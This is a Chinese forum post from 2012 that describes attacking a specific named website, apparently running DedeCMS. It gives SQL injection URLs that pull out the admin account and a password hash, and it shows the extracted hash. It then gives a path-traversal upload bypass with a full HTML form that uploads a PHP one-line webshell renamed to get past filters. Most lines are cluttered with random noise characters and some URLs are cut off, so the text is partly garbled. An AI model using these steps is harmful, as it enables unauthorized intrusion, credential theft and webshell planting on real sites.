①注入漏洞。
& r. A0 O Q8 X+ _这站 http://www.political-security.com/
9 i0 x9 S8 O& j! I( q& W8 u首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
- A( \: x5 t( f5 Swww.political-security.com/data/mysql_error_trace.inc 爆后台
3 c2 T9 X' E X然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
: n2 B- ?3 S5 C( t然后写上语句 8 z" ~1 {* V2 g: [/ S9 R
查看管理员帐号
1 S1 p( A. I, y. @8 k0 s( \ Qhttp://www.political-security.co ... &membergroup=@`
' K R- x+ V1 V ]5 J
( m3 g1 U4 M5 ?admin
' L ~6 L6 O9 ~1 K9 R! F" i( J3 k; f! R1 _$ x
查看管理员密码8 F5 j) N0 A( A3 M( r8 C, B
http://www.political-security.co ... &membergroup=@`, y. o4 Q7 T7 B1 t/ o
: }1 E$ p) W" ]5 Q8 W
8d29b1ef9f8c5a5af429
0 z5 m5 h# L5 g& e1 Y
+ c8 A3 J# F/ o查看管理员密码& G; M1 Q5 x. m. I2 ?) M2 E4 ^* ]
4 p+ _4 {: j1 [+ S& R n2 c) n% E5 |3 C
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
! u! r5 |! Q1 A: s' {, M. c* U* S/ k- `, f L# B
8d2
" {% _- d$ k T$ ]3 X6 |9 z9b1ef9f8c5a5af42
/ _- ~5 h0 O! j0 j+ B. T% m9
5 \8 U" u) F" l% b9 Q2 T* b: k9 }' Q) ]3 n& K" p. X
cmd5没解出来 只好测试第二个方法6 \% ]" Z6 L) J) A5 u7 f
3 O8 C2 D4 U+ U- r& X; Y2 l) K# M- w# q6 E @9 R, ^3 A
②上传漏洞:; `$ D( i- E- k! T
5 }' A) v* }1 B% K' s1 q
只要登陆会员中心,然后访问页面链接
% a( w# k) P. C9 }3 U“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”- E3 f- W5 C( \/ r$ W/ c
/ o; A. H" H; ?! G5 N8 Y如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
( O. [% z0 d3 g9 {& i; Q8 k& j0 K% s- V, Z; p& F* X% A
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm( P6 t1 ~6 M C
2 q3 z$ b$ a, I/ z; H<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>4 H8 _' }+ F& p" `
或者
: U! Y5 z9 B* K# E, e+ W: l0 |9 a即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对